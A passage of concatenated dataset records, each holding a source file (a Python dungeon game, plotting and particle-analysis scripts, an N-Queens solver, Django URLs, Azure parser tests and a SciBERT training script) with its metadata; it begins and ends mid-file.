int(dungeon.difficulty+random.randint(1,4) / 3)\n if hits == 0:\n hits = 1\n elif hits > 3:\n hits = 3\n room.monsters[monster] = actor.Enemy(spawn, hits+3, 0, 0, 0)\n else:\n hits = int(dungeon.difficulty+random.randint(1,4) / 3)\n if hits == 0:\n hits = 1\n elif hits > 3:\n hits = 3\n room.monsters[monster] = actor.Enemy(spawn, hits, 0, 0, random.randint(-2, 0))\n\ndef game(player, dungeon, max_rooms):\n \"\"\"\n main game body\n \"\"\"\n while player.life > 0 and dungeon.room < max_rooms:\n player.reset_stats()\n player.inish = random.randint(1,6)\n dungeon.generate_room(dungeon.room, random.randint(2,4))\n populate_room(dungeon, dungeon.rooms[dungeon.room], enemy_list[random.randint(0,len(enemy_list)-1)])\n dungeon.skip = 0\n print(\"{0}, there are {1} doors in adition to the one you came through\\nThere are {2} monsters in the room\".format(room_descs[random.randint(0, len(room_descs)-1)], len(dungeon.rooms[dungeon.room].doors)-1, len(dungeon.rooms[dungeon.room].monsters)))\n player.found = False\n for monster in range(actor.Enemy.counter):\n if player.inish < dungeon.rooms[dungeon.room].monsters[monster].inish:\n player.found = True\n if not player.found:\n print(\"You have not been noticed\")\n while 1:\n combat(player, dungeon)\n player.found = True\n if dungeon.skip > 0:\n break\n elif player.life < 1:\n break\n if dungeon.skip == 1:\n continue\n if player.life <= 0:\n break\n os.system(\"clear\")\n loot = int(random.randint(1,120) / 10)\n if loot < 8:\n player.loot_item(items.Potion(potion_descs[loot-1], loot))\n print(\"You have looted {0}\".format(potion_descs[loot-1]))\n else:\n player.loot_item(items.Treasure(junk_treasure[random.randint(0, len(junk_treasure)-1)]))\n print(\"You have looted some treasure\")\n if player.life > 0:\n player.reset_stats()\n player.inish = random.randint(1,6)\n dungeon.generate_room(dungeon.room, 1, 1)\n populate_room(dungeon, dungeon.rooms[dungeon.room], boss_list[random.randint(0,len(boss_list)-1)], 1)\n dungeon.skip = 0\n print(\"As you enter the final chamber of the dungeon, a {0} is found in the room, as though placed there by some higher power\".format(dungeon.rooms[dungeon.room].monsters[0].name))\n while len(dungeon.rooms[dungeon.room].monsters) > 0:\n player.found = True\n combat(player, dungeon)\n if dungeon.skip > 0:\n break\n elif player.life < 1:\n break\n print(\"\\nYou have completed the dungeon, way to go\\nCheat mode is ~tgm during the game\")\n\n\ndef main():\n \"\"\"\n main launching point of the program\n \"\"\"\n print(\"Welcome to Dungeon Quest!\")\n print(\"1: New game\\n2: Load game\")\n choice = input(\"Selection > \")\n if choice == \"1\":\n player = input(\"Enter player name > \")\n os.system(\"clear\")\n print(\"Welcome {0}, in this world you will face many challenges, and face possible death\".format(player))\n print(\"Choose difficulty\\n1:easy - 2-4 floors\\n2:medium 3-7 floors\\n3:hard 7-10 floors\")\n challenge = input(\"Selection > \")\n if challenge == \"1\":\n max_rooms = random.randint(1,3)\n elif challenge == \"2\":\n max_rooms = random.randint(2,6)\n elif challenge == \"3\":\n max_rooms = random.randint(6,9)\n else:\n print(\"{0}: invalid input\\ndefaulting to 10 rooms, good luck\".format(challenge))\n max_rooms = 9\n dungeon = d.Map(max_rooms+2, 1)\n dungeon.room = 0\n player = actor.Hero(player)\n os.system(\"clear\")\n game(player, dungeon, max_rooms)\n elif choice == \"2\":\n try:\n file = open(\"dungeon.dat\", \"rb\")\n dungeon = pickle.load(file)\n file.close()\n file = open(\"player.dat\", \"rb\")\n player = pickle.load(file)\n file.close()\n os.system(\"clear\")\n game(player, dungeon, dungeon.room_count-1)\n except:\n print(\"missing or corrupt .dat file(s)\")\n return\n else:\n return\n\nif __name__ == \"__main__\":\n os.system(\"clear\")\n main()\n\n\n","sub_path":"dungeon_dudes.py","file_name":"dungeon_dudes.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165419565","text":"# -*- coding: utf-8 -*-\nfrom common import read, plot\nimport pandas as pd\nimport sys\nimport os\nkeCity = ['天津']\ndef plotArea(city, area):\n if city in keCity:\n cmd = 'python2.7 spider/chengJiaoSpiderKe.py %s %s'%(city, area)\n else:\n cmd = 'python2.7 spider/chengJiaoSpider.py %s %s'%(city, area)\n #os.system(cmd)\n df = read(area)\n gp = df.groupby(['成交时间'])['成交价(元/平)']\n res=pd.DataFrame({\"volume\":gp.size(),\"median_price\":gp.median(), \"mean_price\":gp.mean()})\n res = res.iloc[:len(res),:]\n city = 'default'\n MA = True\n start_date = None\n force = True\n keep_all = True\n for ma_length in [1, 30, 60, 90]:\n title = '%s-%d日均线'%(area, ma_length)\n plot(res, city, title, MA, ma_length, start_date, force, keep_all)\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n city = sys.argv[1]\n area = sys.argv[2]\n plotArea(city, area)\n else:\n print(\"usage: python3 plotArea.py [city] [area]\")\n","sub_path":"plotArea.py","file_name":"plotArea.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81349280","text":"#Type Theory,Set Theory,Category Theory\nfrom meta import Omni,Type\nfrom math import AxiomaticSystem\n\n#集合论中的集合\nclass Set(Type):\n Virtor='Set'\n domain=set(['SetTheory'])\n realm=set(['Omni'])\n \nunion\nintersection\nCartesianProduct\nemptySet=Set('emptySet')\nVonNeumannUniverse=Type('VonNeumannUniverse')#���个全集。\n\nZermeloFraenkelSetTheory=AxiomaticSystem('ZermeloFraenkelSetTheory')#一个集合论公理系统","sub_path":"type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509296391","text":"class Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n ans = []\n positions = [0]*n\n\n # 打印答案\n def printQueue(positions, n):\n strings = []\n for i in positions:\n s = \"\"\n for j in range(n):\n if j == i:\n s += \"Q\"\n else:\n s += \".\"\n strings.append(s)\n ans.append(strings)\n \n # positons:皇后的位置数组\n def isOk(positions, n):\n sum1 = {positions[0]}\n sum2 = {0-positions[0]}\n cols = {positions[0]}\n for i in range(1, n):\n hang_x, hang_y = i + positions[i], i - positions[i]\n if positions[i] in cols or hang_x in sum1 or hang_y in sum2:\n return False\n cols.add(positions[i])\n sum1.add(hang_x)\n sum2.add(hang_y)\n return True\n \n # 回溯找路径\n def backTrack(r_index, n, positions):\n if r_index == n:\n if isOk(positions, n):\n printQueue(positions, n)\n return\n for i in range(n):\n positions[r_index] = i\n if isOk(positions, r_index + 1):\n backTrack(r_index+1, n, positions) \n\n backTrack(0, n, positions)\n return ans","sub_path":"LeetCode/51. N皇后2nd.py","file_name":"51. N皇后2nd.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231228503","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nimport apps.blog.urls\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', 'apps.blog.views.index', name='home'),\n url(r'^blog/', include('apps.blog.urls', namespace='blog')),\n #url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n #url(r'^grappelli/',include('grappelli.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^sitemap.xml', 'apps.blog.views.sitemap'),\n url(r'^baidu_verify_3ymtDfPE09.html', 'apps.blog.views.baidu'),\n \n)\n","sub_path":"django_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"468868697","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n[Function Description]\n----------------------------------------------------------------------------------------------------\nDevide the screen line into 5 sections evenly\nCalculate the sum of particles which contact and penetrate the screen in 5 sections respectively\n----------------------------------------------------------------------------------------------------\n\"\"\"\n\nimport os\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom csv_process import data_process\nfrom ptc_scn_calculation import mass_position_times\n\n# Display all the columns of DataFrame\npd.set_option('display.max_columns', None)\n# Display all the columns of DataFrame within a single row\npd.set_option('display.width', None)\n\n\ndef ptc_position(df_data_time, below_r_x):\n \"\"\"\n 定义筛上、筛下颗粒的位置\n 参数:\n df_data_time:某个时刻的DataFrame\n below_r_x:筛箱中筛下颗粒空间的最右端点的x坐标\n \"\"\"\n ser_ptc_x = df_data_time.ptc_x\n ser_ptc_z = df_data_time.ptc_z\n ser_scn_z = df_data_time.scn_z_lower\n scn_r_x = df_data_time.scn_r_x[0] # 上筛面右端点的x坐标\n # 定义筛上颗粒(颗粒球心在下筛面以上的颗粒)\n ptc_up = df_data_time[(ser_ptc_z >= ser_scn_z) & (ser_ptc_x <= scn_r_x)]\n # 定义筛下颗粒(颗粒球心在下筛面以下的颗粒)\n ptc_down = df_data_time[(ser_ptc_z < ser_scn_z) & (ser_ptc_x < below_r_x)]\n\n return ptc_up, ptc_down\n\n\ndef section_split(df_data_time):\n \"\"\"\n 1.读取某个时刻的DataFrame,获取上筛面端点值的x坐标,将筛网的水平投影距离均分为5段\n 2.将每段的起点和终点存为list,再将5个list存到1个包括所有段的起点终点位置的list中\n \"\"\"\n # 获取上筛面端点值的x坐标\n scn_l_x = df_data_time.scn_l_x[0]\n scn_r_x = df_data_time.scn_r_x[0]\n section_num = 5 # 将筛面均分为5段\n section_lmit_list = np.linspace(scn_l_x, scn_r_x, section_num + 1)\n interval_list = []\n for i in range(len(section_lmit_list) - 1):\n section_interval = [section_lmit_list[i], section_lmit_list[i + 1]]\n interval_list.append(section_interval)\n\n return interval_list # interval_list形如:[[a,b],[b,c],[c,d]...]\n\n\ndef ptc_section(data_times, below_r_x, end_index):\n \"\"\"\n 1.遍历所有筛下颗粒的id,根据id遍历从开始到筛分结束时刻的所有df\n 2.判断该id是否存在于该df中,若有,判断哪个时刻的df中ptc_z < scn_z_lower\n 3.读取该时刻该相应id的颗粒整行数据,判断该颗粒的ptc_x处于筛网哪一段,然后将整行数据append到该段的DataFrame中\n 4.将所有包含透筛颗粒数据分段的DataFrame存储在list中\n \"\"\"\n # 统计结束筛分时刻所有的筛下颗粒\n df_ptc_above, df_ptc_below = ptc_position(data_times[end_index], below_r_x)\n # 将所有筛下颗粒的id转换为list,用于后面遍历id寻找该id颗粒透筛位置\n below_id_list = df_ptc_below['ptc_id'].tolist()\n # 创建5个空DataFrame,分别根据筛下颗粒刚透筛时刻的x值将该颗粒的所有信息(按颗粒id逐行添加)存储在相应筛段的DataFrame中\n df_section1 = pd.DataFrame()\n df_section2 = pd.DataFrame()\n df_section3 = pd.DataFrame()\n df_section4 = pd.DataFrame()\n df_section5 = pd.DataFrame()\n # 遍历筛下颗粒id。根据id遍历开始到结束筛分时刻,寻找该id颗粒刚透筛时刻的,并将该时刻该id颗粒的信息添加到DataFrame中\n for ptc_id in below_id_list:\n # 遍历开始到结束筛分时刻的DataFrame(结束时刻的索引务必+1,range取不到第二个值,有可能刚好在end_time时成为筛下颗粒)\n for df_index in range(1, end_index + 1):\n # 判断该颗粒id是否是该DataFrame的'ptc_id'列中的值\n if ptc_id in data_times[df_index]['ptc_id'].values:\n # 是,则执行以下命令,计算该id的颗粒在该DataFrame中,颗粒与下筛面的相对位置(有正负之分)\n index_single = data_times[df_index][data_times[df_index]['ptc_id'] == ptc_id].index\n ptc_z = data_times[df_index]['ptc_z'][index_single].values\n scn_z = data_times[df_index]['scn_z_lower'][index_single].values\n ptc_scn_dstc = ptc_z - scn_z\n # 若颗粒与下筛面的距离小于0,则满足要求,判断其在哪个筛段透筛,并结束该颗粒的遍历(最上层的for循环)\n if ptc_scn_dstc < 0:\n ptc_data_ser = data_times[df_index].iloc[index_single]\n ptc_below_x = ptc_data_ser['ptc_x'].values # 必须加values属性,否则为Series\n # 计算该时刻的筛段划分\n section_list = section_split(data_times[df_index])\n # 遍历该时刻的所有筛段,一旦该颗粒的x值满足某一段,即添加到该段的DataFrame中,退出该颗粒的遍历\n for sect_index in range(len(section_list)):\n section = section_list[sect_index]\n if (ptc_below_x >= section[0]) & (ptc_below_x <= section[1]):\n if sect_index == 0:\n df_section1 = df_section1.append(ptc_data_ser)\n df_section1 = df_section1.reset_index(drop=True)\n if sect_index == 1:\n df_section2 = df_section2.append(ptc_data_ser)\n df_section2 = df_section2.reset_index(drop=True)\n if sect_index == 2:\n df_section3 = df_section3.append(ptc_data_ser)\n df_section3 = df_section3.reset_index(drop=True)\n if sect_index == 3:\n df_section4 = df_section4.append(ptc_data_ser)\n df_section4 = df_section4.reset_index(drop=True)\n if sect_index == 4:\n df_section5 = df_section5.append(ptc_data_ser)\n df_section5 = df_section5.reset_index(drop=True)\n break\n # 将各个筛段的DataFrame添加到1个list中\n list_ptc_sections = [df_section1, df_section2, df_section3, df_section4, df_section5]\n\n return df_ptc_below, list_ptc_sections\n\n\ndef ptc_section_ratio(data_times, below_r_x, end_index, diam_ratio):\n \"\"\"\n 1.筛选出(1)所有筛下颗粒中小于分离粒度的颗粒(2)筛网各部分透筛颗粒之中小于分离粒度的颗粒,并计算其质量之和\n 2.计算筛网各部分透筛颗粒与所有筛下颗粒的质量之比\n end_index:筛分结束时刻\n \"\"\"\n # 根据分离比计算分离粒度\n diam_scn = 5 # 筛孔宽度\n diam_targ = diam_scn * diam_ratio\n # 计算该实验筛分结束时刻所有透筛颗粒的透筛位置,并根据透筛时刻的x值分段\n ptc_below_df, ptc_sections_list = ptc_section(data_times, below_r_x, end_index)\n # 定义筛下颗粒中小于分离粒径的颗粒,并求其总质量\n below_diam_df = ptc_below_df[ptc_below_df['ptc_diam'] <= diam_targ]\n below_diam_mass = below_diam_df['ptc_mass'].sum()\n # 遍历各个筛网分段,定义透筛颗粒中小于分离粒度的颗粒,并计算其总质量。计算分段透筛比(质量比),并添加到list中\n list_section_ratio = []\n for section_df in ptc_sections_list:\n section_diam_df = section_df[section_df['ptc_diam'] <= diam_targ]\n section_diam_mass = section_diam_df['ptc_mass'].sum()\n section_ratio = section_diam_mass / below_diam_mass # 该段透筛的小颗粒总质量/所有透筛颗粒的小颗粒总质量\n list_section_ratio.append(section_ratio * 100) # 百分比形式\n section_name = ['sec1_pntr', 'sec2_pntr', 'sec3_pntr', 'sec4_pntr', 'sec5_pntr']\n df_section_ratio = pd.DataFrame([list_section_ratio], columns=section_name)\n\n return df_section_ratio\n\n\nif __name__ == '__main__':\n # 记录程序开始时间\n start = time.time()\n\n # CSV文件的完整路径\n folder_path = r'H:\\Data'\n file_name = r'exp002.csv'\n file_path = os.path.join(folder_path, file_name)\n # 调用csv_process.py中data_process函数,处理该路径下的CSV文件的数据\n x_b, incline_angle, data_times_list = data_process(file_path)\n # 将上一步返回的data_times_list作为变量,调用mass_position_times进一步计算颗粒的质量以及筛网的位置\n data_times_list = mass_position_times(data_times_list, incline_angle)\n\n # <1.计算测试>\n # 如果测试的筛分结束时刻存在某个筛段没有颗粒透筛,程序会提示关于‘ptc_diam’的错误!\n section_ratio_df = ptc_section_ratio(data_times_list, x_b, 200, 0.9)\n print(section_ratio_df)\n # <统计计算时间>\n end = time.time()\n # 计算并输出程序计算时间\n cal_time = end - start\n m, s = divmod(cal_time, 60)\n h, m = divmod(m, 60)\n print(\"\\nTotal Computing Time: %02d:%02d:%02d\" % (h, m, s))\n\n # <2.可视化测试>\n fig = plt.figure()\n ax = plt.Subplot(fig, 111)\n fig.add_axes(ax)\n plt.title('Stratification Ratio of Each Section', y=1.05, fontname='Times New Roman', weight='bold', fontsize=30)\n plt.xlabel('Screen Section', fontname='Times New Roman', weight='bold', fontsize=25)\n plt.ylabel('Stratification Ratio', fontname='Times New Roman', weight='bold', fontsize=25)\n plt.tick_params(axis='both', labelsize=10)\n # 常用数据标记形状:圆‘o’、三角形‘^’(4种,尖角代表方向)、四边形‘s’、五边形‘p’、六边形‘h’、星号‘*’\n plt.plot(list(range(1, 6)), section_ratio_df.iloc[0].tolist(), lw=2, c='black',\n marker='s', ms=10, mfc='c', mec='black', mew=2)\n plt.grid(True)\n plt.show()\n","sub_path":"Vibrating_Screen/cal_eff/scn_section_pntrt.py","file_name":"scn_section_pntrt.py","file_ext":"py","file_size_in_byte":10068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"349847462","text":"# simu - Robot simulation. {{{\n#\n# Copyright (C) 2010 Nicolas Schodet\n#\n# APBTeam:\n# Web: http://apbteam.org/\n# Email: team AT apbteam DOT org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n# }}}\n\"\"\"Generic ultra sonic distance sensor (use several rays).\"\"\"\nfrom simu.inter.drawable import Drawable\nfrom simu.view.distance_sensor import DistanceSensor\n\nclass DistanceSensorUS (Drawable):\n\n def __init__ (self, onto, model):\n Drawable.__init__ (self, onto)\n self.model = model\n self.rays = [ ]\n for r in model.rays:\n self.rays.append (DistanceSensor (onto, r))\n\n","sub_path":"host/simu/view/distance_sensor_us.py","file_name":"distance_sensor_us.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"441326608","text":"import pygame\r\npygame.init()\r\n\r\nclass Tile( pygame.sprite.Sprite ):\r\n\t\"\"\"\r\n\t\"\"\"\r\n\tdef __init__( self, top, left, size, color ):\r\n\t\tpygame.sprite.Sprite.__init__( self )\r\n\r\n\t\tself.image = pygame.Surface( ( size, size ) )\r\n\t\tself.rect = self.image.get_rect( topleft = ( top, left ) )\r\n\t\tself.image.fill( color )\r\n\r\n\t\tself._top = top\r\n\t\tself._left = left\r\n\t\tself._size = size\r\n\t\tself._color = color\r\n","sub_path":"game/classes/Tile.py","file_name":"Tile.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"626119774","text":"# <>\n# Copyright 2022, Lawrence Livermore National Security, LLC.\n# See the top-level COPYRIGHT file for details.\n# \n# SPDX-License-Identifier: BSD-3-Clause\n# <>\n\nimport sys\nimport glob, os, shutil, filecmp\n\nPYTHON = sys.executable\n\nfiles = sorted( glob.glob( 't*.py' ) )\n\nif( os.path.exists( 'Out' ) ) : shutil.rmtree( 'Out' )\nos.mkdir( 'Out' )\n\nfor file in files :\n base = file[:-3]\n status = os.system( '%s %s > Out/%s.out' % ( PYTHON, file, base ) )\n if( status ) : print( '=========== %s ===========' % file )\n\nouts = sorted( glob.glob( 'Out/t*.out' ) )\nfor out in outs :\n file = os.path.basename( out )\n if( not( filecmp.cmp( os.path.join( 'Out.checked', file ), out ) ) ) : print( 'ERROR: %s' % out )\n","sub_path":"pqu/Check/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398287854","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/insights/parsers/tests/test_azure_instance_type.py\n# Compiled at: 2020-03-25 13:10:41\nimport pytest, doctest\nfrom insights.parsers import azure_instance_type\nfrom insights.parsers.azure_instance_type import AzureInstanceType\nfrom insights.tests import context_wrap\nfrom insights.parsers import SkipException, ParseException\nfrom insights.core.plugins import ContentException\nAZURE_TYPE_1 = 'Standard_L32s'\nAZURE_TYPE_2 = 'Standard_NV48s_v3'\nAZURE_TYPE_3 = '\\n % Total % Received % Xferd Average Speed Time Time Time Current\\n Dload Upload Total Spent Left Speed\\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\\n 100 1126 100 1126 0 0 1374k 0 --:--:-- --:--:-- --:--:-- 1099k\\nStandard_NV48s_v3\\n'\nAZURE_TYPE_DOC = 'Standard_L64s_v2'\nAZURE_TYPE_AB_1 = ('\\ncurl: (7) Failed to connect to 169.254.169.254 port 80: Connection timed out\\n').strip()\nAZURE_TYPE_AB_2 = (\"\\ncurl: (7) couldn't connect to host\\n\").strip()\nAZURE_TYPE_AB_3 = ('\\ncurl: (28) connect() timed out!\\n').strip()\nAZURE_TYPE_AB_4 = ('\\n.micro\\n').strip()\nAZURE_TYPE_AB_5 = ('\\nNo module named insights.tools\\n').strip()\n\ndef test_azure_instance_type_ab_other():\n with pytest.raises(SkipException):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_1))\n with pytest.raises(SkipException):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_2))\n with pytest.raises(SkipException):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_3))\n with pytest.raises(ParseException) as (pe):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_4))\n assert 'Unrecognized type' in str(pe)\n with pytest.raises(ContentException) as (pe):\n AzureInstanceType(context_wrap(AZURE_TYPE_AB_5))\n\n\ndef test_azure_instance_type_ab_empty():\n with pytest.raises(SkipException):\n AzureInstanceType(context_wrap(''))\n\n\ndef test_azure_instance_type():\n azure = AzureInstanceType(context_wrap(AZURE_TYPE_1))\n assert azure.type == 'Standard'\n assert azure.size == 'L32s'\n assert azure.version is None\n assert azure.raw == 'Standard_L32s'\n azure = AzureInstanceType(context_wrap(AZURE_TYPE_2))\n assert azure.type == 'Standard'\n assert azure.size == 'NV48s'\n assert azure.version == 'v3'\n assert azure.raw == 'Standard_NV48s_v3'\n assert 'NV48s' in str(azure)\n return\n\n\ndef test_azure_instance_type_stats():\n azure = AzureInstanceType(context_wrap(AZURE_TYPE_3))\n assert azure.type == 'Standard'\n assert azure.size == 'NV48s'\n assert azure.version == 'v3'\n assert azure.raw == 'Standard_NV48s_v3'\n\n\ndef test_doc_examples():\n env = {'azure_inst': AzureInstanceType(context_wrap(AZURE_TYPE_DOC))}\n failed, total = doctest.testmod(azure_instance_type, globs=env)\n assert failed == 0","sub_path":"pycfiles/insights_core-3.0.160-py2.7/test_azure_instance_type.py","file_name":"test_azure_instance_type.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"286594117","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import metrics\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom transformers import get_linear_schedule_with_warmup\n\nimport config\nimport dataset\nimport engine\nimport model\n\nif __name__ == \"__main__\":\n # Data preprocessing\n df = pd.read_csv(\"../input/data/train.csv\")\n df['list'] = df[df.columns[3:]].values.tolist()\n new_df = df[['TITLE', 'ABSTRACT', 'list']].copy()\n\n # Creating Dataset and Dataloaders\n train_size = 0.8\n train_dataset = new_df.sample(frac=train_size, random_state=200)\n test_dataset = new_df.drop(train_dataset.index).reset_index(drop=True)\n train_dataset = train_dataset.reset_index(drop=True)\n\n print(\"FULL Dataset: {}\".format(new_df.shape))\n print(\"TRAIN Dataset: {}\".format(train_dataset.shape))\n print(\"TEST Dataset: {}\".format(test_dataset.shape))\n\n training_set = dataset.CustomDataset(train_dataset, config.TOKENIZER, config.MAX_LEN)\n testing_set = dataset.CustomDataset(test_dataset, config.TOKENIZER, config.MAX_LEN)\n\n train_params = {'batch_size': config.TRAIN_BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0\n }\n\n test_params = {'batch_size': config.VALID_BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0\n }\n\n training_loader = DataLoader(training_set, **train_params)\n testing_loader = DataLoader(testing_set, **test_params)\n\n # GPU check and setting the device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n n_gpu = torch.cuda.device_count()\n print(torch.cuda.get_device_name(0))\n\n # Object of ScibertBiLstmClass and setting to device\n model = model.ScibertBiLstmClass()\n model.to(device)\n\n # Model parameters\n param_optimizer = list(model.named_parameters())\n no_decay = [\"bias\", \"LayerNorm.bias\", \"LayerNorm.weight\"]\n optimizer_parameters = [\n {\n \"params\": [\n p for n, p in param_optimizer if not any(nd in n for nd in no_decay)\n ],\n \"weight_decay\": 0.001,\n },\n {\n \"params\": [\n p for n, p in param_optimizer if any(nd in n for nd in no_decay)\n ],\n \"weight_decay\": 0.0,\n },\n ]\n\n # Optimizer and Scheduler\n optimizer = torch.optim.AdamW(optimizer_parameters, lr=3e-5)\n num_training_steps = int(len(train_dataset) / config.TRAIN_BATCH_SIZE * config.EPOCHS)\n\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=0,\n num_training_steps=num_training_steps\n )\n\n # Training loop\n best_micro = 0\n for epoch in range(config.EPOCHS):\n engine.train(epoch, model, training_loader, device, optimizer, scheduler)\n outputs, targets = engine.validation(epoch, model, testing_loader, device)\n outputs = np.array(outputs) >= 0.5\n accuracy = metrics.accuracy_score(targets, outputs)\n f1_score_micro = metrics.f1_score(targets, outputs, average='micro')\n f1_score_macro = metrics.f1_score(targets, outputs, average='macro')\n print(f\"Accuracy Score = {accuracy}\")\n print(f\"F1 Score (Micro) = {f1_score_micro}\")\n print(f\"F1 Score (Macro) = {f1_score_macro}\")\n if f1_score_micro > best_micro:\n torch.save(model.state_dict(), config.MODEL_PATH)\n best_micro = f1_score_micro","sub_path":"scibert-bilstm/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"410922897","text":"''' Person module '''\nfrom __future__ import absolute_import\nimport Config\n\n\nclass Person(object):\n ''' contains properties which are common to both bomberman and enemy'''\n\n def __init__(self):\n ''' init fx '''\n self.lives = 1\n self.position = ['', '']\n self.shape = [[' ', ' ', ' ', ' '], [' ', ' ', ' ', ' ']]\n\n def getlives(self):\n ''' player life '''\n return self.lives\n\n def getposition(self):\n ''' player position '''\n return self.position\n\n def setposition(self, x_val, y_val):\n ''' fix player '''\n self.position = [x_val, y_val]\n\n def moveright(self):\n ''' move right '''\n [x_val, y_val] = self.getposition()\n i = [0, 1, 2, 3, 4]\n j = 0\n while i[j] < 4:\n bomb = Config.ARR[x_val][y_val + 4] != 'E' and Config.ARR[x_val][y_val\n + 4].isdigit() and True\n if (bomb or 'X' in Config.ARR[x_val][y_val + 4]\n or '/' in Config.ARR[x_val][y_val + 4]\n or 'e' in Config.ARR[x_val][y_val + 4]) and True:\n self.setposition(x_val, y_val)\n else:\n self.setposition(x_val, y_val + 4)\n j = j + 1\n\n def moveleft(self):\n ''' move left '''\n [x_val, y_val] = self.getposition()\n i = [0, 1, 2, 3, 4]\n j = 0\n while i[j] < 4:\n bomb = Config.ARR[x_val][y_val - 4] != 'E' and Config.ARR[x_val][y_val\n - 4].isdigit() and True\n if (bomb or 'X' in Config.ARR[x_val][y_val - 4]\n or '/' in Config.ARR[x_val][y_val - 4]\n or 'e' in Config.ARR[x_val][y_val - 4]) and True:\n self.setposition(x_val, y_val)\n else:\n self.setposition(x_val, y_val - 4)\n j = j + 1\n\n def moveup(self):\n ''' move up '''\n [x_val, y_val] = self.getposition()\n i = [0, 1, 2, 3, 4]\n j = 0\n while i[j] < 4:\n bomb = Config.ARR[x_val - 2][y_val] != 'E' and Config.ARR[x_val\n - 2][y_val].isdigit() and True\n if (bomb or 'X' in Config.ARR[x_val - 2][y_val]\n or '/' in Config.ARR[x_val - 2][y_val]\n or 'e' in Config.ARR[x_val - 2][y_val]) and True:\n self.setposition(x_val, y_val)\n else:\n self.setposition(x_val - 2, y_val)\n j = j + 1\n\n def movedown(self):\n ''' move down '''\n [x_val, y_val] = self.getposition()\n i = [0, 1, 2, 3, 4]\n j = 0\n while i[j] < 4:\n bomb = Config.ARR[x_val + 2][y_val] != 'E' and Config.ARR[x_val\n + 2][y_val].isdigit() and True\n if (bomb or 'X' in Config.ARR[x_val + 2][y_val]\n or '/' in Config.ARR[x_val + 2][y_val]\n or 'e' in Config.ARR[x_val + 2][y_val]) and True:\n self.setposition(x_val, y_val)\n else:\n self.setposition(x_val + 2, y_val)\n j = j + 1\n\n def death(self):\n ''' player death '''\n self.lives = self.lives - 1\n\n def bomberkiller(self, bomb):\n ''' kill enemy '''\n [x_val1, y_val1] = bomb.getposition()\n [x_val, y_val] = self.getposition()\n if x_val1 == x_val and y_val1 != y_val and True:\n if abs(y_val1 - y_val) <= 4:\n self.death()\n return True\n if y_val1 == y_val and x_val1 != x_val and True:\n if abs(x_val1 - x_val) <= 2:\n self.death()\n return True\n return False\n","sub_path":"Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"149809869","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nBuild a simple Question Classifier using TF-IDF or Bag of Words Model\n\"\"\"\n\nimport sys\nimport json\nimport io\nimport os\n\nimport numpy\n\nfrom sklearn.datasets import load_files\nfrom sklearn import metrics\nfrom sklearn.externals import joblib\nfrom sklearn.pipeline import Pipeline, FeatureUnion\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer, TfidfTransformer\nfrom sklearn.feature_extraction import 